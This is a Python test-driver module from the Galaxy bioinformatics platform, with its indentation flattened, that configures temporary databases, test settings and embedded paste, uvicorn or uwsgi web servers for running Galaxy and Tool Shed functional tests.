galaxy_root = galaxy_directory()
DEFAULT_CONFIG_PREFIX = "GALAXY"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(galaxy_root, "lib", "tool_shed", "test", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = "config/migrated_tools_conf.xml"
INSTALLED_TOOL_PANEL_CONFIGS = [os.environ.get("GALAXY_TEST_SHED_TOOL_CONF", "config/shed_tool_conf.xml")]
REALTIME_PROXY_TEMPLATE = string.Template(
r"""
uwsgi:
http-raw-body: true
interactivetools_map: $tempdir/interactivetools_map.sqlite
python-raw: scripts/interactivetools/key_type_token_mapping.py
# if interactive tool path, jump to interactive tool, else skip to
# endendend (default uwsgi params).
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ goto:interactivetool
route-run: goto:endendend
route-label: interactivetool
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ rpcvar:TARGET_HOST rtt_key_type_token_mapper_cached $1 $3 $2 $4 $0 5
route-if-not: empty:${TARGET_HOST} httpdumb:${TARGET_HOST}
route: .* break:404 Not Found
route-label: endendend
"""
)
DEFAULT_LOCALES = "en"
USE_UVICORN = asbool(os.environ.get("GALAXY_TEST_USE_UVICORN", True))
log = logging.getLogger("test_driver")
# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
tool_shed_test_tmp_dir = os.environ.get("TOOL_SHED_TEST_TMP_DIR", None)
if tool_shed_test_tmp_dir is None:
tool_shed_test_tmp_dir = os.path.realpath(tempfile.mkdtemp())
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
# the full path to the temporary directroy wher eht repositories are located cannot contain invalid url characters.
os.environ["TOOL_SHED_TEST_TMP_DIR"] = tool_shed_test_tmp_dir
return tool_shed_test_tmp_dir
def get_galaxy_test_tmp_dir():
"""Create test directory for use by Galaxy server being setup for testing."""
galaxy_test_tmp_dir = os.environ.get("GALAXY_TEST_TMP_DIR", None)
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
return galaxy_test_tmp_dir
def configure_environment():
"""Hack up environment for test cases."""
# no op remove if unused
if "HTTP_ACCEPT_LANGUAGE" not in os.environ:
os.environ["HTTP_ACCEPT_LANGUAGE"] = DEFAULT_LOCALES
# Used by get_filename in tool shed's twilltestcase.
if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
"""Build a logger for test driver script."""
return log
def ensure_test_file_dir_set():
"""Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.
Return first directory for backward compat.
"""
galaxy_test_file_dir = os.environ.get("GALAXY_TEST_FILE_DIR", GALAXY_TEST_FILE_DIR)
os.environ["GALAXY_TEST_FILE_DIR"] = galaxy_test_file_dir
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
return first_test_file_dir
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
prefer_template_database=False,
log_format=None,
conda_auto_init=False,
conda_auto_install=False,
use_shared_connection_for_amqp=False,
allow_tool_conf_override: bool = True,
allow_path_paste=False,
):
"""Setup environment and build config for test Galaxy instance."""
# For certain docker operations this needs to be evaluated out - e.g. for cwltool.
tmpdir = os.path.realpath(tmpdir)
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
template_cache_path = tempfile.mkdtemp(prefix="compiled_templates_", dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix="new_files_path_", dir=tmpdir)
job_working_directory = tempfile.mkdtemp(prefix="job_working_directory_", dir=tmpdir)
user_library_import_dir: Optional[str]
if use_test_file_dir:
first_test_file_dir = ensure_test_file_dir_set()
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
import_dir = os.path.join(first_test_file_dir, "users")
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get("GALAXY_TEST_JOB_CONFIG_FILE", default_job_config_file)
tool_path = os.environ.get("GALAXY_TEST_TOOL_PATH", "tools")
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = None
for data_manager_config in ["config/data_manager_conf.xml", "data_manager_conf.xml"]:
if os.path.exists(data_manager_config):
default_data_manager_config = data_manager_config
data_manager_config_file = "test/functional/tools/sample_data_manager_conf.xml"
if default_data_manager_config is not None:
data_manager_config_file = f"{default_data_manager_config},{data_manager_config_file}"
master_api_key = get_admin_api_key()
cleanup_job = (
"never"
if ("GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ)
else "onsuccess"
)
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix="data_manager_tool-data", dir=tmpdir)
if allow_tool_conf_override:
tool_conf = os.environ.get("GALAXY_TEST_TOOL_CONF", default_tool_conf)
else:
tool_conf = default_tool_conf
conda_auto_install = os.environ.get("GALAXY_TEST_CONDA_AUTO_INSTALL", conda_auto_install)
conda_auto_init = os.environ.get("GALAXY_TEST_CONDA_AUTO_INIT", conda_auto_init)
conda_prefix = os.environ.get("GALAXY_TEST_CONDA_PREFIX")
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = f"{tool_conf},{shed_tool_conf}"
# Resolve these paths w.r.t. galaxy root; otherwise galaxy's config system will resolve them w.r.t.
# their parent directories, as per schema.
data_manager_config_file = _resolve_relative_config_paths(data_manager_config_file)
tool_config_file = _resolve_relative_config_paths(tool_conf)
tool_data_table_config_path = _resolve_relative_config_paths(tool_data_table_config_path)
config = dict(
admin_users="test@bx.psu.edu",
allow_library_path_paste=True,
allow_path_paste=allow_path_paste,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as="test@bx.psu.edu",
auto_configure_logging=logging_config_file is None,
chunk_upload_size=100,
conda_prefix=conda_prefix,
conda_auto_init=conda_auto_init,
conda_auto_install=conda_auto_install,
cleanup_job=cleanup_job,
retry_metadata_internally=False,
data_dir=tmpdir,
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
expose_dataset_path=True,
ftp_upload_purge=False,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret="changethisinproductiontoo",
job_config_file=job_config_file,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
override_tempdir=False,
master_api_key=master_api_key,
running_functional_tests=True,
template_cache_path=template_cache_path,
tool_config_file=tool_config_file,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
webhooks_dir=TEST_WEBHOOKS_DIR,
logging=LOGGING_CONFIG_DEFAULT,
monitor_thread_join_timeout=5,
object_store_store_by="uuid",
simplified_workflow_run_ui="off",
)
if default_shed_tool_data_table_config:
config["shed_tool_data_table_config"] = default_shed_tool_data_table_config
if not use_shared_connection_for_amqp:
config[
"amqp_internal_connection"
] = f"sqlalchemy+sqlite:///{os.path.join(tmpdir, 'control.sqlite')}?isolation_level=IMMEDIATE"
config.update(database_conf(tmpdir, prefer_template_database=prefer_template_database))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if asbool(os.environ.get("GALAXY_TEST_USE_HIERARCHICAL_OBJECT_STORE")):
object_store_config = os.path.join(tmpdir, "object_store_conf.yml")
with open(object_store_config, "w") as f:
contents = """
type: hierarchical
backends:
- id: files1
type: disk
weight: 1
files_dir: "${temp_directory}/files1"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp1"
- type: job_work
path: "${temp_directory}/job_working_directory1"
- id: files2
type: disk
weight: 1
files_dir: "${temp_directory}/files2"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp2"
- type: job_work
path: "${temp_directory}/job_working_directory2"
"""
contents_template = string.Template(contents)
expanded_contents = contents_template.safe_substitute(temp_directory=tmpdir)
f.write(expanded_contents)
config["object_store_config_file"] = object_store_config
if datatypes_conf is not None:
config["datatypes_config_file"] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
tool_dependency_dir = os.environ.get("GALAXY_TOOL_DEPENDENCY_DIR")
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff
# TODO: read from Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir or os.path.join(tmpdir, "dependencies")
return config
def _resolve_relative_config_paths(config_option):
# If option is not None, split into paths, resolve each w.r.t. root, then rebuild as csv string.
if config_option is not None:
resolved = []
for path in config_option.split(","):
resolved.append(os.path.join(galaxy_root, path.strip()))
return ",".join(resolved)
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get(
"GALAXY_TEST_TOOL_DATA_TABLE_CONF", default_tool_data_table_config_path
)
if tool_data_table_config_path is None:
# ... otherwise find whatever Galaxy would use as the default and
# the sample data for functional tests to that.
default_tool_data_config = "lib/galaxy/config/sample/tool_data_table_conf.xml.sample"
for tool_data_config in ["config/tool_data_table_conf.xml", "tool_data_table_conf.xml"]:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
test_tool_data_config = "test/functional/tool-data/sample_tool_data_tables.xml"
tool_data_table_config_path = f"{default_tool_data_config},{test_tool_data_config}"
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=None, plugins=None):
"""Setup a nose context and run tests.
Tests are specified by argv (defaulting to sys.argv).
"""
if env is None:
env = os.environ
if ignore_files is None:
ignore_files = []
if plugins is None:
plugins = nose.plugins.manager.DefaultPluginManager()
if argv is None:
argv = sys.argv
test_config = nose.config.Config(
env=os.environ,
ignoreFiles=ignore_files,
plugins=plugins,
)
# Add custom plugin to produce JSON data used by planemo.
test_config.plugins.addPlugin(StructuredTestDataPlugin())
test_config.configure(argv)
result = run(test_config)
success = result.wasSuccessful()
return success
def copy_database_template(source, db_path):
"""Copy a 'clean' sqlite template database.
From file or URL to specified path for sqlite database.
"""
db_path_dir = os.path.dirname(db_path)
if not os.path.exists(db_path_dir):
os.makedirs(db_path_dir)
if os.path.exists(source):
shutil.copy(source, db_path)
assert os.path.exists(db_path)
elif source.lower().startswith(("http://", "https://", "ftp://")):
try:
download_to_file(source, db_path)
except Exception as e:
# We log the exception but don't fail startup, since we can
# do all migration steps instead of downloading a template.
log.exception(e)
else:
raise Exception(f"Failed to copy database template from source {source}")
def database_conf(db_path, prefix="GALAXY", prefer_template_database=False):
"""Find (and populate if needed) Galaxy database connection."""
database_auto_migrate = False
check_migrate_databases = True
dburi_var = f"{prefix}_TEST_DBURI"
template_name = None
if dburi_var in os.environ:
database_connection = os.environ[dburi_var]
# only template if postgres - not mysql or sqlite
do_template = prefer_template_database and database_connection.startswith("p")
if do_template:
database_template_parsed = urlparse(database_connection)
template_name = database_template_parsed.path[1:] # drop / from /galaxy
actual_db = f"gxtest{''.join(random.choice(string.ascii_uppercase) for _ in range(10))}"
actual_database_parsed = database_template_parsed._replace(path=f"/{actual_db}")
database_connection = actual_database_parsed.geturl()
if not database_exists(database_connection):
# We pass by migrations and instantiate the current table
create_database(database_connection)
mapping.init("/tmp", database_connection, create_tables=True, map_install_models=True)
toolshed_mapping.init(database_connection, create_tables=True)
check_migrate_databases = False
else:
default_db_filename = f"{prefix.lower()}.sqlite"
template_var = f"{prefix}_TEST_DB_TEMPLATE"
db_path = os.path.join(db_path, default_db_filename)
if template_var in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
copy_database_template(os.environ[template_var], db_path)
database_auto_migrate = True
database_connection = f"sqlite:///{db_path}"
config = {
"check_migrate_databases": check_migrate_databases,
"database_connection": database_connection,
"database_auto_migrate": database_auto_migrate,
}
if not database_connection.startswith("sqlite://"):
config["database_engine_option_max_overflow"] = "20"
config["database_engine_option_pool_size"] = "10"
if template_name:
config["database_template"] = template_name
return config
def install_database_conf(db_path, default_merged=False):
install_galaxy_database_connection: Optional[str]
if "GALAXY_TEST_INSTALL_DBURI" in os.environ:
install_galaxy_database_connection = os.environ["GALAXY_TEST_INSTALL_DBURI"]
elif asbool(os.environ.get("GALAXY_TEST_INSTALL_DB_MERGED", default_merged)):
install_galaxy_database_connection = None
else:
install_galaxy_db_path = os.path.join(db_path, "install.sqlite")
install_galaxy_database_connection = f"sqlite:///{install_galaxy_db_path}"
conf = {}
if install_galaxy_database_connection is not None:
conf["install_database_connection"] = install_galaxy_database_connection
return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
"""Create a mock database/ directory like in GALAXY_ROOT.
Use prefix to default this if TOOL_SHED_TEST_DBPATH or
GALAXY_TEST_DBPATH is set in the environment.
"""
environ_var = f"{prefix}_TEST_DBPATH"
if environ_var in os.environ:
db_path = os.environ[environ_var]
else:
tempdir = tempfile.mkdtemp(dir=test_tmpdir)
db_path = os.path.join(tempdir, "database")
return db_path
def _get_static_settings():
"""Configuration required for Galaxy static middleware.
Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
static_dir = os.path.join(galaxy_root, "static")
# TODO: these should be copied from config/galaxy.ini
return dict(
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join(static_dir, "images", ""),
static_favicon_dir=os.path.join(static_dir, "favicon.ico"),
static_scripts_dir=os.path.join(static_dir, "scripts", ""),
static_style_dir=os.path.join(static_dir, "style"),
static_robots_txt=os.path.join(static_dir, "robots.txt"),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent to ``app_factory``."""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
global_conf.update(_get_static_settings())
return global_conf
def wait_for_http_server(host, port, prefix=None, sleep_amount=0.1, sleep_tries=150):
"""Wait for an HTTP server to boot up."""
# Test if the server is up
prefix = prefix or "/"
if not prefix.endswith("/"):
prefix = f"{prefix}/"
for _ in range(sleep_tries):
# directly test the app, not the proxy
conn = http.client.HTTPConnection(host, port)
try:
conn.request("GET", prefix)
response = conn.getresponse()
if response.status == 200:
break
except OSError as e:
if e.errno not in [61, 111]:
raise
time.sleep(sleep_amount)
else:
template = "Test HTTP server on host %s and port %s did not return '200 OK' after 10 tries"
message = template % (host, port)
raise Exception(message)
def attempt_port(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind(("", port))
sock.close()
return port
except OSError:
return None
def attempt_ports(port):
if port is not None:
return port
raise Exception(f"An existing process seems bound to specified test server port [{port}]")
else:
random.seed()
for _ in range(0, 9):
port = attempt_port(random.randint(8000, 10000))
if port:
port = str(port)
os.environ["GALAXY_WEB_PORT"] = port
return port
raise Exception(f"Unable to open a port between {8000} and {10000} to start Galaxy server")
def serve_webapp(webapp, port=None, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running on.
"""
server = None
port = attempt_ports(port)
server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
t = threading.Thread(target=server.serve_forever)
t.start()
return server, port
def uvicorn_serve(app, port, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running on.
"""
import asyncio
from uvicorn.config import Config
from uvicorn.server import Server
access_log = False if "GALAXY_TEST_DISABLE_ACCESS_LOG" in os.environ else True
config = Config(app, host=host, port=int(port), access_log=access_log)
server = Server(config=config)
def run_in_loop(loop):
try:
asyncio.set_event_loop(loop)
loop.run_until_complete(server.serve())
finally:
loop.close()
asyncio.set_event_loop(None)
log.info("Event loop for uvicorn closed")
loop = asyncio.new_event_loop()
t = threading.Thread(target=run_in_loop, args=(loop,))
t.start()
return server, port, t
def cleanup_directory(tempdir):
"""Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.
Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
"""
skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
if skip_cleanup:
log.info(f"GALAXY_TEST_NO_CLEANUP is on. Temporary files in {tempdir}")
return
try:
if os.path.exists(tempdir) and not skip_cleanup:
shutil.rmtree(tempdir)
except Exception:
pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
"""Modify Galaxy app's toolbox for migrated or installed tool tests."""
if testing_installed_tools:
# TODO: Do this without modifying app - that is a pretty violation
# of Galaxy's abstraction - we shouldn't require app at all let alone
# be modifying it.
tool_configs = app.config.tool_configs
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove(relative_migrated_tool_panel_config)
for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
tool_configs.append(installed_tool_panel_config)
from galaxy import tools # delay import because this brings in so many modules for small tests # noqa: E402
app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs) -> GalaxyUniverseApplication:
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary and use load_app_properties so
Galaxy override variables are respected. Also setup "global" references
to sqlalchemy database context for Galaxy and install databases.
"""
log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
simple_kwargs["global_conf"] = get_webapp_global_conf()
simple_kwargs["global_conf"]["__file__"] = "lib/galaxy/config/sample/galaxy.yml.sample"
simple_kwargs = load_app_properties(kwds=simple_kwargs)
# Build the Universe Application
app = GalaxyUniverseApplication(**simple_kwargs)
log.info("Embedded Galaxy application started")
global galaxy_context
global install_context
galaxy_context = app.model.context
install_context = app.install_model.context
# Toolbox indexing happens via the work queue out of band recently, and,
# beyond potentially running async after tests execute doesn't execute
# without building a uwsgi app (app.is_webapp = False for this test kit).
# We need to ensure to build an index for the test galaxy app -- this is
# pretty fast with the limited toolset
app.reindex_tool_search()
return app
def build_shed_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary. Also setup "global" reference
to sqlalchemy database context for tool shed database.
"""
log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
# TODO: Simplify global_conf to match Galaxy above...
simple_kwargs["__file__"] = "tool_shed_wsgi.yml.sample"
simple_kwargs["global_conf"] = get_webapp_global_conf()
app = ToolshedUniverseApplication(**simple_kwargs)
log.info("Embedded Toolshed application started")
global tool_shed_context
tool_shed_context = app.model.context
return app
def explicitly_configured_host_and_port(prefix, config_object):
host_env_key = f"{prefix}_TEST_HOST"
port_env_key = f"{prefix}_TEST_PORT"
port_random_env_key = f"{prefix}_TEST_PORT_RANDOM"
default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
host = os.environ.get(host_env_key, default_web_host)
if os.environ.get(port_random_env_key, None) is not None:
# Ignore the port environment variable, it wasn't explictly configured.
port = None
else:
port = os.environ.get(port_env_key, None)
# If an explicit port wasn't assigned for this test or test case, set this
# environment variable so we know it is random. We can then randomly re-assign
# for new tests.
if port is None:
os.environ["GALAXY_TEST_PORT_RANDOM"] = "1"
else:
os.environ["GALAXY_WEB_PORT"] = port
return host, port
def set_and_wait_for_http_target(prefix, host, port, url_prefix, sleep_amount=0.1, sleep_tries=150):
host_env_key = f"{prefix}_TEST_HOST"
port_env_key = f"{prefix}_TEST_PORT"
os.environ[host_env_key] = host
os.environ[port_env_key] = port
wait_for_http_server(host, port, url_prefix, sleep_amount=sleep_amount, sleep_tries=sleep_tries)
class ServerWrapper:
def __init__(self, name, host, port, prefix=""):
self.name = name
self.host = host
self.port = port
self.prefix = prefix
@property
def app(self):
raise NotImplementedError("Test can be run against target - requires a Galaxy app object.")
def stop(self):
raise NotImplementedError()
class EmbeddedServerWrapper(ServerWrapper):
def __init__(self, app, server, name, host, port, prefix="", thread=None):
super().__init__(name, host, port, prefix)
self._app = app
self._server = server
self._thread = thread
@property
def app(self):
return self._app
def stop(self):
log.info(f"{threading.active_count()} threads were active before stopping embedded server")
if self._server is not None and hasattr(self._server, "server_close"):
log.info(f"Shutting down embedded {self.name} Paste server")
self._server.server_close()
log.info(f"Embedded web server {self.name} stopped")
if self._server is not None and hasattr(self._server, "shutdown"):
log.info(f"Shutting down embedded {self.name} uvicorn server")
self._server.should_exit = True
log.info(f"Embedded web server {self.name} stopped")
if self._thread is not None:
log.info("Stopping embedded server thread")
self._thread.join()
log.info("Embedded server thread stopped")
if self._app is not None:
log.info(f"Stopping application {self.name}")
self._app.shutdown()
log.info(f"Application {self.name} stopped.")
log.info(f"{threading.active_count()} active after stopping embedded server")
class UwsgiServerWrapper(ServerWrapper):
def __init__(self, p, name, host, port):
super().__init__(name, host, port)
self._p = p
self._r = None
self._t = threading.Thread(target=self.wait)
self._t.start()
def __del__(self):
self._t.join()
def wait(self):
self._r = self._p.wait()
def stop(self):
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGTERM)
except Exception:
pass
time.sleep(0.1)
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGKILL)
except Exception:
pass
self._t.join()
def launch_uwsgi(kwargs, tempdir, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
config = {}
config["galaxy"] = kwargs.copy()
enable_realtime_mapping = getattr(config_object, "enable_realtime_mapping", False)
if enable_realtime_mapping:
interactive_tool_defaults = {
"interactivetools_prefix": "interactivetool",
"interactivetools_map": os.path.join(tempdir, "interactivetools_map.sqlite"),
"interactivetools_enable": True,
}
for key, value in interactive_tool_defaults.items():
if key not in config["galaxy"]:
config["galaxy"][key] = value
yaml_config_path = os.path.join(tempdir, "galaxy.yml")
with open(yaml_config_path, "w") as f:
yaml.dump(config, f)
if enable_realtime_mapping:
# Avoid YAML.dump configuration since uwsgi doesn't like real YAML :( -
# though maybe it would work?
with open(yaml_config_path) as f:
old_contents = f.read()
with open(yaml_config_path, "w") as f:
test_port = str(port) if port else r"[0-9]+"
test_host = re.escape(host) if host else "localhost"
uwsgi_section = REALTIME_PROXY_TEMPLATE.safe_substitute(
test_host=test_host, test_port=test_port, tempdir=tempdir
)
f.write(uwsgi_section)
f.write(old_contents)
def attempt_port_bind(port):
uwsgi_command = [
"uwsgi",
"--http",
f"{host}:{port}",
"--yaml",
yaml_config_path,
"--module",
"galaxy.webapps.galaxy.buildapp:uwsgi_app_factory()",
"--enable-threads",
"--die-on-term",
]
for path in sys.path:
uwsgi_command.append("--pythonpath")
uwsgi_command.append(path)
handle_uwsgi_cli_command = getattr(config_object, "handle_uwsgi_cli_command", None)
if handle_uwsgi_cli_command is not None:
handle_uwsgi_cli_command(uwsgi_command)
# we don't want to quote every argument but we don't want to print unquoted ones either, so do this
log.info("Starting uwsgi with command line: %s", " ".join(shlex.quote(x) for x in uwsgi_command))
p = subprocess.Popen(
uwsgi_command,
cwd=galaxy_root,
preexec_fn=os.setsid,
)
return UwsgiServerWrapper(p, name, host, port)
port = attempt_ports(port)
server_wrapper = attempt_port_bind(port)
try:
set_and_wait_for_http_target(prefix, host, port, url_prefix="/", sleep_tries=50)
log.info(f"Test-managed uwsgi web server for {name} started at {host}:{port}")
return server_wrapper
except Exception:
server_wrapper.stop()
def launch_uvicorn(webapp_factory, prefix=DEFAULT_CONFIG_PREFIX, galaxy_config=None, config_object=None):
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
port = attempt_ports(port)
gx_app = build_galaxy_app(galaxy_config)
gx_wsgi_webapp = webapp_factory(
galaxy_config["global_conf"],
app=gx_app,
use_translogger=False,
static_enabled=True,
register_shutdown_at_exit=False,
)
from galaxy.webapps.galaxy.fast_app import initialize_fast_app
app = initialize_fast_app(gx_wsgi_webapp, gx_app)
server, port, thread = uvicorn_serve(app, host=host, port=port)
set_and_wait_for_http_target(prefix, host, port, url_prefix=gx_app.config.galaxy_url_prefix)
log.info(f"Embedded uvicorn web server for {name} started at {host}:{port}{gx_app.config.galaxy_url_prefix}")
return EmbeddedServerWrapper(
gx_app, server, name, host, port, thread=thread, prefix=gx_app.config.galaxy_url_prefix
)
def launch_server(app, webapp_factory, kwargs, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
"""Launch a web server for a given app using supplied factory.
Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
all set after this method has been called.
"""
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
webapp = webapp_factory(
kwargs["global_conf"], app=app, use_translogger=False, static_enabled=True, register_shutdown_at_exit=False
)
server, port = serve_webapp(webapp, host=host, port=port)
set_and_wait_for_http_target(prefix, host, port, url_prefix="/")
log.info(f"Embedded paste web server for {name} started at {host}:{port}")
return EmbeddedServerWrapper(app, server, name, host, port)
class TestDriver:
"""Responsible for the life-cycle of a Galaxy-style functional test.
Sets up servers, configures tests, runs nose, and tears things
down. This is somewhat like a Python TestCase - but different
because it is meant to provide a main() endpoint.
"""
__test__ = False # Prevent pytest from discovering this class (issue #12071)
def __init__(self):
"""Setup tracked resources."""
self.server_wrappers = []
self.temp_directories = []
def setup(self):
"""Called before tests are built."""
def build_tests(self):
"""After environment is setup, setup nose tests."""
def tear_down(self):
"""Cleanup resources tracked by this object."""
self.stop_servers()
for temp_directory in self.temp_directories:
cleanup_directory(temp_directory)
def stop_servers(self):
for server_wrapper in self.server_wrappers:
server_wrapper.stop()
self.server_wrappers = []
def mkdtemp(self):
"""Return a temp directory that is properly cleaned up or not based on the config."""
temp_directory = tempfile.mkdtemp()
self.temp_directories.append(temp_directory)
return temp_directory
def run(self):
"""Driver whole test.
Setup environment, build tests (if needed), run test,
and finally cleanup resources.
"""
configure_environment()
self.setup()
self.build_tests()
try:
success = nose_config_and_run()
return 0 if success else 1
except Exception as e:
log.info("Failure running tests")
raise e
finally:
log.info("Shutting down")
self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def _configure(self, config_object=None):
"""Setup various variables used to launch a Galaxy server."""
config_object = self._ensure_config_object(config_object)
self.external_galaxy = os.environ.get("GALAXY_TEST_EXTERNAL", None)
# Allow a particular test to force uwsgi or any test to use uwsgi with
# the GALAXY_TEST_UWSGI environment variable.
use_uwsgi = bool(os.environ.get("GALAXY_TEST_UWSGI", None))
if not use_uwsgi:
if getattr(config_object, "require_uwsgi", None):
use_uwsgi = True
self.use_uwsgi = use_uwsgi
if getattr(config_object, "use_uvicorn", USE_UVICORN):
self.else_use_uvicorn = True
else:
self.else_use_uvicorn = False
# Allow controlling the log format
log_format = os.environ.get("GALAXY_TEST_LOG_FORMAT", None)
if not log_format and use_uwsgi:
log_format = (
"%(name)s %(levelname)-5.5s %(asctime)s "
"[p:%(process)s,w:%(worker_id)s,m:%(mule_id)s] "
"[%(threadName)s] %(message)s"
)
self.log_format = log_format
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
self.testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
allow_tool_conf_override = getattr(config_object, "allow_tool_conf_override", True)
self.allow_tool_conf_override = allow_tool_conf_override
self.default_tool_conf = default_tool_conf
self.datatypes_conf_override = datatypes_conf_override
def setup(self, config_object=None):
